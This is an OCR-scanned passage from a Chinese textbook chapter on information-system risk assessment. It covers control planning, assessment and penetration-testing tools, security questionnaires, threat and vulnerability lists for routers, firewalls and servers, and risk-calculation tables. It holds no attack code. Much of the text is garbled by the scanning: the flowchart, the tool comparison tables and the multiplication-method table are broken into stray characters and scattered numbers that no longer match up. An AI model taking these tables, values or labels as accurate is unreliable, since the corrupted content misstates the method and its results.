《风险 评估 报告 ) 汇总 上 述 分 析 报 告 和 等 级 列表 ,综合 评价 风险 的 等 级 
15.4.6 控制 及 规划 


分 析 阶 段 完 成 之 后 ,风险 评估 项 目 组 将 根据 风险 分 析 的 结果 ,结合 国家 有 关 的 法 律 、 法 
规 和 标准 ,总 结 出 被 评估 信息 系统 当前 的 安全 需求 ,并 根据 安全 需求 的 轻重 缓急 以 及 相关 标 
准 和 机 构 保障 框架 的 要 求 制订 出 适合 的 安全 规划 方案 ,为 进一步 的 安全 建设 提供 参考 。 风 
险 控制 过 程 中 的 输出 文档 及 其 内 容 如 表 15-14 所 示 。 


表 15-14 风险 控制 过 程 的 输出 文档 及 其 内 容 


阶 段 输出 文档 文档 内 容 
从 技术 层面 ( 即 物理 平台 、 系 统 平台 、 网 络 平台 和 应 用 平 
控制 目标 确立 《风险 控制 需求 分 析 报告 》 台 ) 组织 层面 ( 即 结构 .岗位 和 人 员 ) 和 管理 层面 ( 即 策 
略 ,规章 和 制度 ) 分 析 风 险 控制 的 需求 
《风险 控制 目标 列表 》 风险 控制 目标 的 列表 ,包括 控制 对 象 及 其 最 低 保 护 等 级 
15.4.7 总 结汇 报 


召开 项 目 总 结 会 议 ,向 领导 小 组 汇报 风险 评估 情况 ,在 描述 安全 风险 之 后 表述 出 采取 何 
种 对 策 防 范 威 胁 \ 减 少 脆弱 性 ,并 将 问题 的 轻重 缓急 描述 清楚 。 输 出 文档 及 其 内 容 如 表 15-15 


所 示 。 


表 15-15 风险 控制 过 程 的 输出 文档 及 其 内 容 


Wo = 输出 文档 文档 内 容 
控制 措施 实施 | 《风险 控 制 实施 计划 书 》| 风 险 控 制 的 范围 .对 象 \ 目 标 、 组 织 结构 、 成 本 预算 和 进度 安排 等 
15.4.8 验收 


总 结汇 报 经 过 领导 小 组 认可 后 ,双方 进行 项 目 验收 工作 ,交接 文档 ,签字 验收 ,填写 客户 


满意 度 调查 表 。 


实践 


提交 的 风险 评估 记录 是 根据 风险 评估 程序 ,要 求 风险 评估 过 程 中 的 各 种 现场 记录 可 复 
现 评估 过 程 ,并 作为 产生 歧义 后 解决 问题 的 依据 。 


15.5 风险 评估 实施 流程 图 


风险 评估 实施 流程 图 如 图 15-1 所 示 。 


风险 评估 准备 
DENM: PUYU] 
; Ë suas = = 已 有 安全 措施 确认 
CHEMIK: m 
人 0 系统 调研 ; ORPA: 
DASEN: oti 
司 确定 依据 ; 加 成 胁 识别 ; 
NIU ONER 
人 @ 制 定 方案 : 
BM E 评估 风险 等 级 
所 出 风险 控制 需求 
项 目 验收 
图 15-1 


15.6 风险 评估 工具 


根据 在 风险 评估 过 程 中 的 主要 任务 和 作用 原理 的 不 同 ,风险 评估 工具 可 以 分 成 风险 评 
佑 与 管理 工具 、 系 统 基础 平台 风险 评估 工具 和 风险 评估 辅助 工具 。 


1. 风险 评估 与 管理 工具 


风险 评估 与 管理 工具 集成 了 风险 评估 各 类 知识 和 判 据 的 管理 信息 系统 ,以 规范 风险 评 
估 的 过 程 和 操作 方法 ; 或 者 是 用 于 收集 评估 所 需要 的 数据 和 资料 ,基于 专家 经 验 ,对 输入 输 
出 进行 模型 分 析 ; 包括 基于 信息 安全 标准 的 风险 评估 与 管理 工具 (如 ASSET、CC Toolbox 
等 )、 基 于 知识 的 风险 评估 与 管理 工具 (如 COBRA、MSAT、@RISK 等 ) 和 基于 模型 的 风险 
评估 与 管理 工具 (如 RA、CORA 等 ) ,具体 如 表 15-16 所 示 。 

系统 基础 平台 风险 评估 工具 主要 用 于 对 信息 系统 的 主要 部 件 ( 如 操作 系统 、 数 据 库 系 
统 、 网 络 设备 等 ) 的 脆弱 性 进行 分 析 ,或 实施 基于 脆弱 性 的 攻击 ,主要 包括 脆弱 性 扫描 工具 和 
渗透 性 测试 工具 。 脆 弱 性 扫描 工具 包括 基于 网 络 的 扫描 器 .基于 主机 的 扫描 器 、 分 布 式 网 络 
扫描 器 和 数据 库 脆弱 性 扫描 器 。 


表 15-16 风险 评估 与 管理 工具 内 容 


名 称 @RISK ASSET BDSS CORA COBRA |CRAMM | RA/SYS | RiskWatch 

体系 结构 | 单机 单机 单机 单机 [c/s 单机 单机 单机 

过 程式 过 程式 | 过 程式 
所 用 方法 | 专家 系统 | 基于 知识 | 专家 系统 | 算法 ERRA | 算法 a 专家 系统 
EE .. ue Fo "m "rd oi dim z nem 
数据 采集 | 调查 文件 | 调查 问卷 | 调查 问卷 | 调查 文件 | 调查 文件 | 过 程 过 程 调查 文件 
决策 支持 | 提供 控制 | 安全 防护 | 决策 支持 | 特困 报 | 结 果 报 | 风险 等 | 风险 分 析 
输出 结果 | 信息 目标 和 | 措施 列表 | 信息 。 | 各 风险 | 告 、 风险 | 级 ,控制 | sa 报告 
建议 a 等 级 等 级 措施 idc 
2. 渗透 性 测试 工具 


该 类 工具 根据 脆弱 性 扫描 工具 扫描 的 结果 进行 模拟 攻击 测试 ,判断 被 非法 访问 者 利用 


的 可 能 性 ,通常 包括 黑客 工具 、 脚 本 文件 等 ,如 表 15-17 所 示 。 


表 15-17 渗透 性 测试 工具 内 容 


EEye ISS Network World Wide 
BindView Digital Nessus | Associates Digital 
- c5 Bed HarkerShield| Security inierunt Security | CyberCop Sa Security 
Scanner 
Retina Scanner SAINT 
操作 系统 | Windows | Windows | Windows | Windows | UNIX Windows | UNIX UNIX 
内 建 的 自 | 能 够 自动 _， | 能 够 自动 
动 更 新 oum eor PUER EEAS ano TA | 无 上 功能 | 无 此 功能 
特征 络 下 载 ) 络 下 载 ) 
扫描 类 型 基于 网 络 | 基 于 主机 | 基于 主机 | 基于 主机 | 基于 网 络 | 基于 主机 | 基于 网 络 | 基 于 网 络 
的 扫描 | 的 扫描 的 扫描 — 的 扫描 | 的 扫描 | 的 扫描 | 的 扫描 ”| 的 扫描 
CVEXIM 没有 对 应 | 对 应 CVE| 没 有 对 应 | 对 应 CVE| 对 应 CVE| 没 有 对 应 | 对 应 CVE| 对 应 CVE 
CVE 列表 | 列表 CVE 列表 | 列表 列表 CVE 列表 | 列表 列表 
是 否 能 够 
对 选 点 的 
漏洞 进行 B 能 够 能 够 E 8 能 够 8 否 
修复 


3. 风险 评估 辅助 工具 


这 类 工具 实现 对 数据 的 采集 、 现 状 分 析 和 趋势 分 析 等 单项 功能 ,为 风险 评估 各 要 素 的 赋 
值 定 级 提供 依据 。 检 查 列表 是 基于 特定 标准 或 基线 建立 的 对 特定 系统 进行 审查 的 项 目 条 
款 。 风 险 评估 辅助 工具 包括 入 侵 检测 系统 、 安 全 审计 工具 、 拓 扑 发 现 工具 、 资 产 信息 收 集 系 
统 和 其 他 资源 库 等 。 
CD. 入 侵 检 测 网 络 或 主机 造成 危害 的 入 侵 攻 击 事件 ; 帮助 检测 各 种 攻击 试探 和 误 操 
作 ; 同时 也 可 以 作为 一 个 警报 器 ,提醒 管理 员 发 生 的 安全 状况 。 
(2) 安全 审计 工具 用 于 记录 网 络 行为 ,分 析 系 统 或 网 络 安全 现状 ; 它 的 审计 记录 可 以 


实践 


作为 风险 评估 中 的 安全 现状 数据 ,并 可 用 于 判断 被 评估 对 象 威胁 信息 的 来 源 。 
(3) 拓扑 发 现 工具 主要 是 自动 完成 网 络 硬件 设备 的 识别 ,发现 功 能。 
(4) 资产 信息 收集 系统 通过 提供 调查 表 形 式 , 完 成 被 评估 信息 系统 数据 ,管理 .人 员 等 
资产 信息 的 收集 功能 。 
(5) 其 他 还 包括 评估 指标 库 、 知 识 库 、 漏 洞 库 . 算 法 库 及 模型 库 等 。 


15.7 风险 识别 
15.7.1 资产 识别 


资产 识别 说 明 如 表 15-18 所 示 。 
表 15-18 ”资产 识别 说 明 


— 应 用 系统 | 资产 名 称 | 资产 编号 | 维护 人 | 型 号 配置 | 购 机 年 限 | 整体 负荷 | 重要 性 程度 
网 络 系统 | 资产 名 称 | 资产 编号 | 维护 人 | 型 号 配置 | 购 机 年 限 | 整体 负荷 | 重要 性 程度 
文档 和 数据 资产 名 称 | 责任 人 “| 备份 形式 | 存储 形式 a 备注 
人 力 资产 识别 岗位 岗位 描述 | 姓名 备注 
厂商 服务 | 重要 性 
业务 应 用 资产 名 称 | 设计 容量 | 系统 负荷 能 力 程度 
适用 范围 | 、 重要 性 
物理 环境 资产 名 称 描述 适用 年 限 | 整体 负荷 程度 
15.7.2 威胁 识别 


通过 对 应 用 系统 、 网 络 系统 、 文 档 和 数据 软件 ,物理 环境 设计 调查 问卷 ,根据 答案 的 汇 
总 进行 确定 ,各 要 素 如 表 15-19 Bron o 


表 15-19 调查 问卷 要 素 

| 安全 要 素 
层次 | 身份 | 自主 访 | p | 强制 访 mam | 安全 | 数据 完 | 数据 保 CO. Ram 
鉴别 | 问 控制 问 控制 | 控制 | 审计 | 整 性 | 密 性 | 路 径 全 监控 


(1) 身份 鉴别 包括 如 表 15-20 所 示 的 内 容 。 
表 15-20 身份 鉴别 


问卷 题目 


用 户 识别 (2) 所 标识 用 户 在 信息 系统 生存 周期 内 是 否 具有 唯一 性 ? 


(3) 对 用 户 标识 信息 的 管理 、 维 护 是 否 可 被 非 授权 地 访问 、 修 改 或 删除 ? 


(1) 在 SSF 实施 所 要 求 的 动作 之 前 ,是 否 对 提出 该 动作 要 求 的 用 户 进行 标识 ? 


续 表 


用 户 鉴别 


(1) 在 SSF 实施 所 要 求 的 动作 之 前 ,是 否 对 提出 该 动作 要 求 的 用 户 进行 鉴别 ? 

(2) 是 否 检测 并 防止 使 用 伪造 或 复制 的 鉴别 数据 ? 

(3) 能 否 提供 一 次 性 使 用 鉴别 数据 操作 的 鉴别 机 制 ? 

(4) 能 否 提供 不 同 的 鉴别 机 制 ? 根据 所 描述 的 多 种 鉴别 机 制 如 何 提供 鉴别 的 规则 ? 
(5) 能 否 规定 需要 重新 鉴别 用 户 的 事件 ? 


用 户 -主体 绑 定 


对 一 个 已 识别 和 鉴别 的 用 户 , 是 否 通过 用 户 -主体 绑 定 将 该 用 户 与 该 主体 相关 联 ? 


(2) 自主 访问 控制 主要 包括 如 表 15-21 所 示 的 内 容 。 


表 15-21 自主 访问 控制 


"E" 问卷 题目 
wapa | 1 是否 按 确 定 的 自主 访问 控制 安全 策略 实现 主 休 与 客体 建 近 作 的 控制 ? 
(D 是 否 有 多 个 自主 访问 控制 安全 策略 , 且 多 个 策略 独立 命名 ? 
CD. 能 否 在 安全 属性 或 命名 的 安全 属性 组 的 客体 上 执行 访问 控制 SFP? 
(2) 在 基于 安全 属性 的 允许 主体 对 客体 访问 的 规则 的 基础 上 ,能 否 允许 主体 对 客体 的 
访问 控制 功能 访问 ? 
(3) 在 基于 安全 属性 的 拒绝 主体 对 客体 访问 的 规则 的 基础 上 ,能 否 拒 绝 主体 对 客体 的 
访问 ? 
CD 每 个 确定 的 自主 访问 控制 ,SSF 是 否 著 莫 网 络 系 统 中 所 定义 的 主体 .客体 及 其 之 
访问 控制 范围 nisus 
(2) 每 个 确定 的 自主 访问 控制 ,SSF JE Z 8 8: F4#8 Z t h PE M 2 Ue de He 3 3022 II 
的 操作 ? 
访问 控制 粒度 ”| 网 络 系统 中 自主 访问 控制 粒度 为 查 粒度 /中 粒度 /7 细 粒度 ? 


CD 标记 主要 包括 表 15-22 所 示 的 内 容 。 


表 15-22 标记 
要 #* 问卷 题目 
主体 标记 是 否 为 强制 访问 控制 的 主体 指定 敏感 标记 ? 
客体 标记 是 否 为 强制 访问 控制 的 客体 指定 敏感 标记 ? 
标记 完整 性 敏感 标记 能 否 准 确 表 示 特 定 主体 或 客体 的 访问 控制 属性 ? 


将 一 客体 信息 输出 到 一 个 具有 多 级 安全 的 1/O 设备 时 ,与 客体 有 关 的 敏感 标记 


有 标记 信息 的 输出 也 可 输出 ? 


@ 对 于 单 级 安全 设备 ,授权 用 户 能 否 可 靠 地 实现 指定 的 安全 级 的 信息 通信 ? 


(4) 强制 访问 控制 要 素 主 要 内 容 如 表 15-23 所 示 。 


表 15-23 强制 访问 控制 


要 £x 问卷 题目 
访问 控制 策略 是 否 为 强制 访问 控制 的 主体 指定 敏感 标记 ? 
客体 标记 是 否 为 强制 访问 控制 的 客体 指定 敏感 标记 ? 


标记 完整 性 


敏感 标记 能 否 准 确 表示 特定 主体 或 客体 的 访问 控制 属性 ? 


实践 


续 表 
素 问卷 题目 


CD 将 一 客体 信息 输出 到 一 个 具有 多 级 安全 的 1/O 设备 时 ,与 客体 有 关 的 敏感 标记 


有 标记 信息 的 输出 也 可 输出 ? 


@ 对 于 单 级 安全 设备 ,授权 用 户 能 否 可 靠 地 实现 指定 的 安全 级 的 信息 通信 ? 


(5) 用 户 数据 完整 性 要 素 主 要 内 容 如 表 15-24 所 示 。 


表 15-24 用 户 数 据 完整 性 


要 素 问卷 题目 
T O 是 否 对 基于 用 户 属性 的 所 有 客体 ,对 用 户 数据 进行 完整 性 检测 ? 
TR D 当 检测 到 完整 性 错误 时 ,能 否 采取 必要 的 恢复 、 审 计 或 报警 措施 ? 
二 O 是 否 对 被 传输 的 用 户 数据 进行 检测 ? 
binds D 数据 交换 恢复 若 没 有 可 恢复 复 件 ,能 否 向 源 可 信 IT 系统 提供 反馈 信息 ? 
处 理 数 据 的 完整 性 对 信息 系统 处 理 中 的 数据 ,能 否 通过 “ 回 退 "进行 完整 性 保护 ? 


(6) Jl 


日 户 数据 保密 性 要 素 主 要 内 容 如 表 15-25 所 示 。 
表 15-25 用 户 数 据 保密 性 


要 素 问卷 题目 


存储 数据 的 保密 性 | 是 否 对 存储 在 SSC 内 的 用 户 数 据 进行 保密 性 保护 ? 


传输 数据 的 保密 性 | 是 否 对 在 SSC 内 的 用 户 数据 进行 保密 性 保护 ? 


客体 安全 重用 


CD 将 安全 控制 范围 之 内 的 某 个 子 集 的 客体 资源 分 配给 某 一 用 户 或 进程 时 ,是 否 会 
泄露 该 客体 中 的 原 有 信息 ? 

D 将 安全 控制 范围 之 内 的 所 有 客体 资源 分 配给 某 一 用 户 或 进程 时 ,是 否 会 泄露 该 
客体 中 的 原 有 信息 ? 


(7) 其 他 要 素 , 如 表 15-26 所 示 。 


R 15-26 HEER 
问卷 题目 


认证 


CD 是 否 提供 注册 服务 机 制 ? 
Q 只 提供 点 到 点 的 认证 服务 还 是 提供 端 到 端的 认证 服务 ? 
O 是 否 更 新 现 有 的 身份 识别 以 符合 最 新 Web 服务 安全 规范 ? 


授权 


CD 对 访问 资源 提供 大 粒度 的 访问 控制 还 是 小 粒度 的 访问 控制 ? 
Q 是 否 更 新 现 有 接 人 控制 安全 策略 以 满足 服务 安全 规范 ? 
© 认证 成 功 之 后 , 是 否 在 运行 时 根据 资源 访问 权限 列表 来 检查 服务 请 求 者 的 访问 级 别 ? 


审计 性 


CD 管理 员 是 否 可 以 在 生命 周期 的 不 同时 刻 追 踪 并 找 出 服务 请 求 ? 
@ 哪些 技术 提供 了 不 可 否认 性 的 一 个 关键 元 素 ? 


不 可 否认 性 


(D 是 否 支 持 不 可 否认 性 ? (不 可 否认 性 使 得 用 户 能 够 证 明 事 务 是 在 拥有 合法 证 书 的 情况 
下 进行 的 .) 

O 是 否 包含 时 间 戳 .序列 号 有 效 期 、 消 息 相关 等 元 素 ,并 进行 签名 从 而 保证 消息 的 唯一 性 
( 当 缓 存 这 些 信息 时 ,可 以 检测 出 重 放 攻击 )? 


通过 工具 能 进行 已 知 病毒 扫描 \ 变 种 和 加 壳 恶 意 程序 扫描 、 恶 意 程序 行为 分 析 引 擎 、 
网 络 蠕虫 病毒 扫描 、 网 页 信誉 服务 ; 能 解决 的 问题 包括 恶意 程序 实时 分 析 系统 、 恶 意 程序 
的 深度 分 析 、 恶 意 程 序 的 处 置 建议 等 ; 可 得 出 的 结论 包括 漏洞 信息 摘要 、 漏 洞 的 详细 描 
述 、 解 决 方案 、 风 险 系数 总 体 风险 等 级 、 感 染 源 统计 、 威 胁 统计 及 潜在 风险 等 ,如 图 15-2 
Bim. 


威胁 发 生 的 可 能 性 
i [amaan] H 
威胁 的 影响 程度 | 一 | 风险 等 级 
重要 性 程度 H 
图 15-2 分 析 过 程 


风险 等 级 划分 具体 如 表 15-27 所 示 。 


表 15-27 等 级 划分 
风险 值 宇 900 极 高 5 4 
900 二 风险 值 宇 700 高 4 3 
700 二 风险 值 宇 500 中 3 2 
500 二 风险 值 宇 300 低 2 1 
300 二 风险 值 极 低 à 0 


15.7.3 脆弱 性 识别 


1. 手动 进行 审计 和 分 析 


CD 通过 对 日 志 的 查询 和 分 析 , 快 速 对 潜在 的 系统 入 侵 做 出 记录 和 预测 ,对 发 生 的 安全 
问题 进行 及 时 总 结 。 

CD 对 关键 网 络 、 安 全 和 服务 器 日 志 进行 备份 。 

Q 定期 对 关键 网 络 、 安 全 设备 和 服务 器 日 志 进 行 检查 和 分 析 ,形成 记录 。 

(2) 权限 和 口令 管理 如 下 。 

CD 对 关键 设备 按 最 新 安全 访问 原则 设置 访问 控制 权限 ,并 及 时 清理 宛 余 系统 用 户 , 正 
确 分 配 用 户 权限 。 

© 建立 口令 管理 制度 ,定期 修改 操作 系统 、 数 据 库 及 应 用 系统 管理 员 口 令 , 并 做 相关 
记录 。 

© 登录 口令 修改 频率 不 低 于 每 月 一 次 。 

@ 登录 口令 长 度 的 限制 ,并 采用 数字 、 字 母 , 符 号 混 排 的 方式 。 

C) 采取 限制 IP 登录 的 管理 措施 。 

(3) 实时 监控 记录 如 下 。 

CD 对 服务 器 .主干 网 络 设备 的 性 能 ,进行 24 小 时 实时 监控 的 记录 进行 检查 。 


实践 


© 对 服务 器 .主干 网 络 设备 的 运行 情况 ,对 实时 监控 的 记录 进行 检查 。 
© 对 网 络 流量 、 网 站 内 容 进行 实时 监控 ,对 实时 监控 的 记录 进行 检查 。 


2. 利用 安全 审计 和 文档 安全 工具 


专业 公司 均 有 安全 审计 查阅 工具 ,可 实现 审计 查阅 有 限 审计 查阅 .可 选 审计 查阅 等 功 
能 。 模 拟 渗透 测试 工具 通常 包括 黑客 工具 、 脚 步 文件 等 。 

例如 免费 渗透 测试 工具 Dsniff 是 一 个 优秀 的 网 络 审计 和 渗透 测试 工具 ,是 一 个 包含 多 
种 测试 工具 的 软件 套件 。 另 有 收费 渗透 测试 工具 天 融 信 渗透 测试 产品 。 


15.7.4 风险 评估 结果 的 确定 


根据 心理 学 家 提出 的 “人 区 分 信息 等 级 的 极限 能 力 为 7 土 2” 的 研究 理论 ,划分 风险 为 
0 一 8 九 个 等 级 ,如 表 15-28 所 示 。 


表 15-28 风险 等 级 
等 级 LEE: 等 级 LEE: 
0 风险 度 极 低 5 风险 度 中 上 
1 风险 度 低 6 风险 度 高 
2 风险 度 偏 低 7 风险 度 较 高 
3 风险 度 中 下 8 风险 度 极 高 
4 风险 度 中 


信息 系统 威胁 类 别 及 描述 如 表 15-29 所 示 。 


表 15-29 信息 系统 面临 的 威胁 列表 


威胁 编号 威胁 类 别 描 g 
T-01 | 硬件 故障 由 于 设备 硬件 故障 导致 对 业务 高 效 稳定 运行 的 影响 
T-02 | 未 授权 访问 因 系 统 或 网 络 访问 控制 不 当 引起 的 非 授权 访问 
T-03 | 漏洞 利用 利用 操作 系统 本 身 的 漏洞 导致 的 威胁 
y ,a | 由 于 应 该 执行 而 没有 执行 相应 的 操作 ,或 非 故意 地 执行 了 错误 的 操 
T-04 | 操作 失误 或 维护 错误 作 , 对 系统 造成 影响 
T-05 | 木马 后 门 攻击 木马 后 门 攻击 
T-06 | 恶意 代码 和 病毒 有 具有 复制 、 自 我 传播 能 力 , 对 信息 系统 构成 破坏 的 程序 代码 
T-07 | 原 发 抵赖 不 承认 收 到 的 信息 和 所 作 的 操作 
T-08 | 权限 滥用 滥用 自己 的 职权 ,做 出 泄露 或 破坏 
T-09 | 泄密 通过 窃听 、 恶 意 攻 击 的 手段 获得 系统 秘密 信息 
T-10 | 数据 自 改 通过 恶意 攻击 非 授权 修改 信息 ,破坏 信息 的 完整 性 


技术 脆弱 性 评估 如 表 15-30 所 示 。 


表 15-30 技术 脆弱 性 评估 


资产 名 称 脆弱 性 ID 脆弱 性 名 称 脆弱 性 描述 
EN Cisco 路 由 器 未 设置 密码 ,将 允许 攻 
sua VULN-01 | Cisco 未 设置 密码 击 者 获得 网 络 的 更 多 信息 
VULN-02 | Cisco iOS 界面 被 IPv4 数据 包 阻塞 Pa ataq Pen ma U 
路 由 器 -2 VULN-03 | 没有 制定 访问 控制 策略 没有 制定 访问 控制 策略 
VULN-04 | 安装 与 维护 缺乏 管理 安装 与 维护 缺乏 管理 
交换 机 -1 VULN-05 | 日 志 及 管理 功能 未 启用 日 志 及 管理 功能 未 启用 
当 发 送 畸 形 的 SIP 数据 包 时 ,可 导 
VULN-06 | CSCdz39284 s 5 CE 
当 发 送 畸 形 的 SSH 数据 包 时 ,可 导 
VULN-07 | CSCdw33027 Petsa DE 
Cisco 的 iOS 软件 有 一 个 漏洞 ,允许 
VULN-08 | CSCds04747 s. ei 
audi 没有 配备 Service Password Encryption | 没有 配备 Service Password Encryption 
VULN-09 | 服务 "t 
"TT VULN-10 | 安装 与 维护 缺乏 管理 安装 与 维护 缺乏 管理 
VULN-11 | 缺少 操作 规程 和 职责 管理 缺少 操作 规程 和 职责 管理 
防火 墙 -2 VULN-12 | 防火 墙 开 放 端 口 增加 防火 墙 开放 端口 增加 
VULN-13 | 防火 墙 关键 模块 失效 防火 墙 关键 模块 失效 
防火 墙 -3 VULN-14 | 未 启用 日 志 功能 未 启用 日 志 功 能 
VULN-15 | 操作 系统 补丁 未 安装 未 及 时 安装 补丁 
VULN-16 | 设备 不 稳定 设备 不 稳定 
防 病毒 服务 器 | VULN-17 | 操作 系统 的 口令 策略 没有 启用 | 操作 系统 的 日 令 策略 没有 启用 
VULN-18 | 操作 系统 开放 多 余 服 务 操作 系统 开放 多 余 服 务 
VULN-19 | 缺少 操作 规程 和 职责 管理 缺少 操作 规程 和 职责 管理 
VULN-20 | 存在 弱 口 令 存在 弱 口令 
数据 服务 器 。 [VULN-21 | 操作 系统 补丁 未 安 装 未 及 时 安装 补丁 
VULN-22 | 没有 访问 控制 措施 没有 访问 控制 措施 
VULN-23 | 缺少 操作 规程 和 职责 管理 缺少 操作 规程 和 职责 管理 
VULN-24 | 存在 弱 口 令 存在 弱 口 令 
应 用 服务 器 VULN-25 | 操作 系统 补丁 未 安装 未 及 时 安装 补丁 
VULN-26 | Telnet 漏洞 未 及 时 安装 补丁 
VULN-27 | 可 以 通过 SMB 连接 注册 表 可 以 通过 SMB 连接 注册 表 
VULN-28 | 操作 系统 补丁 未 安装 未 及 时 安装 补丁 
PC-1 VULN_20 | 使 用 NetBIOS 探测 Windows 主机 | 使 用 NetBIOS 探测 Windows 主机 
信息 信息 
VULN-30 | 木马 和 后 门 木马 和 后 门 
PC-2 VULN-31 | SMB shares access SMB 登录 
VULN-32 | 弱 口令 mue 
UPS VULNG3 | 设备 不 稳定 设备 不 稳定 
空调 VULN-34 | 设备 不 稳定 设备 不 稳定 


实践 


资产 .威胁 脆弱 性 关联 情况 如 表 15-31 所 示 。 
表 15-31 资产 威胁、 脆弱 性 关联 情况 


资产 HO BM 威胁 频率 k 弱 性 严重 程度 

路 由 器 -1 未 授权 访问 2 Cisco 未 设置 密码 3 
漏洞 利用 5 Cisco iOS 界面 被 IPv4 数据 包 阻 塞 3 
路 由 器 -2 未 授权 访问 2 没有 制定 访问 控制 策略 4 
操作 失误 或 维护 错误 2 安装 与 维护 缺乏 管理 4 
交换 机 -1 ”| 漏洞 利用 5 日 志 及 管理 功能 未 启用 3 
CSCdz39284 3 

交换 机 -2 ”| 漏洞 利用 5 
CSCdw33027 3 
CSCds04747 4 
kasi mna . 没有 配备 Service Password Encryption 服务 4 
安装 与 维护 缺乏 管理 5 
防火 墙 -1 | 操作 失误 或 维护 错误 2 WR RRSAHMEREM ; 
防火 墙 开 放 端口 增加 5 
防火 墙 -2 | 未 授权 访问 1 了 ^ 
防火 墙 -3 | 原 发 抵赖 3 未 启用 日 志 功 能 5 
恶意 代码 或 病毒 3 操作 系统 补丁 未 安装 5 
硬件 故障 1 设备 不 稳定 5 
MERS 未 授权 访问 4 操作 系统 的 口令 策略 没有 启用 5 
木马 后 门 攻击 4 操作 系统 开放 多 余 服 务 4 
操作 失误 或 维护 错误 2 缺少 操作 规程 和 职责 管理 5 
未 授权 访问 4 存在 弱 口 令 5 
u— 恶意 代码 或 病毒 $ 操作 系统 补丁 未 安装 5 
权限 滥用 4 没有 访问 控制 措施 4 
操作 失误 或 维护 错误 2 缺少 操作 规程 和 职责 管理 5 
未 授权 访问 4 存在 弱 口令 5 
应 用 服务 器 | 恶意 代码 或 病毒 3 操作 系统 补丁 未 安装 5 
Telnet 漏洞 4 
aue ° 可 以 通过 SMB 连接 注册 表 5 
Fe 恶意 代码 或 病毒 3 操作 系统 补丁 未 安装 5 
数据 自 改 3 使 用 NetBIOS 探测 Windows 主机 信息 5 
恶意 代码 或 病毒 3 木马 和 后 门 5 
PC-2 Sg a 3 SMB Shares Access 4 
gu 4 mue 5 
UPS 硬件 故障 1 设备 不 稳定 5 
空调 硬件 故障 1 设备 不 稳定 5 


矩阵 法 风险 计算 表 如 表 15-32 所 示 。 
表 15-32 ”矩阵 法 风险 计算 表 


之 | 资产 | ,| 威胁 | ouy | 严重 | 安全 事件 | 可 能 性 | 安全 事 | 损失 [| ,| 风险 
资产 威胁 脆弱 性 风险 值 
价值 频率 程度 | 可 能 性 | 等 级 | 件 损失 | 等 级 等 级 
T02| 2 |vuLN-ol| 3 10 2 6 2 8 2 
Aol| 1 
To3| 5 |VULN-2| 3 17 4 6 2 15 3 
To2| 2 |VULNos| 4 13 3 12 3 13 3 
A-02| 2 
TO4| 2 |VULN-M| 4 13 3 12 3 13 3 
A-3| 3 |To3| 5 |VULNos| 3 17 4 m 3 17 3 
VULN-6| 3 17 4 m 3 17 3 
A-4| 3 |Tos| 5 
VULN-07| 3 17 4 m 3 17 3 
VULN-08| 4 20 4 19 4 20 4 
A-05| 4 |Tos| 5 
VULN-09| 4 20 4 19 4 20 4 
VULN-10| 5 17 4 22 5 23 4 
A-06| 4 [To] 2 
VULNAD| 5 17 4 22 5 23 4 
VULN-12| 5 14 3 20 4 16 3 
A-7| 3 [Toz] 1 
VULNAS| 4 n 2 15 3 9 2 
A-o8| 3 |To7| 3 |VULN-M| 5 20 4 20 4 20 4 
T06| 3 |vuLN-15| 5 20 4 20 4 20 4 
Tol| 1 |VULN436| 5 14 3 20 4 16 3 
A-09| 3 
T-02| 4 |VULN-17| 5 22 5 20 4 23 4 
To5| 4 |VULNA8| 4 18 4 15 3 17 3 
T04| 2 |vULN-19| 5 17 4 22 5 23 4 
awl a Z| 4 [vuna] s 22 5 22 5 25 5 
T06| 3 |VULN-21| 5 20 4 22 5 23 4 
To8| 4 |VULN-22| 4 18 4 19 4 20 4 
Tod| 2 |VULN-23| 5 17 4 22 5 23 4 
Toz| 4 |VULN-4| 5 22 5 22 5 25 5 
All| 4 |To6| 3 |VULN25| 5 20 4 22 5 23 4 
T-o3| 5 |VULN26| 4 20 4 19 4 20 4 
VULN-27| 5 25 5 22 5 25 5 
aal a [T5] 3 [vunz] s 20 4 22 5 23 4 
Tilo| s |VULNz9| 5 20 4 22 5 23 4 
To6| 3 |VULN-0| 5 20 4 22 5 23 4 
A43| 4 [Tao] 3 |VULN-31| 4 16 3 19 4 16 3 
To9| 4 |VULN32| 5 22 5 22 5 25 5 
Au| 4 [To] 1 |VULN-33| 5 14 3 22 5 20 4 
A15| 3 [To] 1 |VULN-34| 5 14 3 20 4 16 3 


实践 


相 乘 法 风险 计算 表 如 表 15-33 所 示 。 


表 15-3 ” 相 乘 法 风险 计算 表 


3 
3 


4 
4 
3 
3 


4 


3 
3 


4 


3 
3 
4 
4 


4 
4 
4 
3 


2 


风险 值 | 风险 等 级 


V135 
V135 
V135 
4/320 
V320 


200 
200 


15 
15 


300 
192 
200 
20 


300 
16 


200 
120 
300 


V320 


300 


300 


300 


4/192 


20 


100 


3 
3 


420 
4/20 


418 
V15 


V15 
MA 
4/20. 
4/20. 
4/20. 


4/20 
V20 
V20 


V20 
V20 
4/20 


4 


V20 


V20 


安全 事件 | 安全 事 
可 能 性 | 件 损失 


A10. 
V10 


V15 


V15 


V20 
Mg 
J/10 
J/20 
4/15. 


4/10. 


46 


A15. 


415 
4/15 
4/15 


V20 


45 


严重 程度 


3 
3 
4 
4 
3 
3 
3 
4 
4 
5 
5 


5 
4 


5 
5 
5 
5 
4 


5 
5 
5 
4 


5 
5 
5 
4 
5 
5 
5 
5 
4 
5 
5 


5 


VULN-01 


VULN-02 


VULN-03 


VULN-04 


VULN-05 


VULN-06 


VULN-07 


VULN-08 


VULN-09 


VULN-10| 


VULN-11 


VULN-12 


VULN-13 


VULN-14 


VULN-15 


VULN-16 


VULN-17 


VULN-18 


VULN-19 


VULN-20 


VULN-21 


VULN-22 


VULN-23 


VULN-24 


VULN-25 


VULN-26 


VULN-27 


VULN-28 


VULN-29 


VULN-30| 


VULN-31 


VULN-32 


VULN-33 


VULN-34 


2 
5 
2 
2 
5 


3 
3 
1 
4 
4 


2 
4 


3 
4 


2 
4 
3 


3 
3 
3 
3 
4 
1 


1 


T-02 
T-03 
T-02 
T-04 
T-03 


T-03 


T-03 


T-04 


T-02 


T-07 
T-06 
T-01 


T-02 
T-05 
T-04 
T-02 
T-06 
T-08 
T-04 
T-02 
T-06 


T-03 


T-06 
T-10 
T-06 
T-10 
T-09 
T-01 


T-01 


资产 “| 资产 价值 | 威胁 | 威胁 频率 | 脆弱 性 


A-01 


A-02 


A-03 


A-04 


A-05 


A-06 


A-07 


A-08 


A-09 


A-10 


A-11 


A-12 


A-13 


A-14 


A-15 


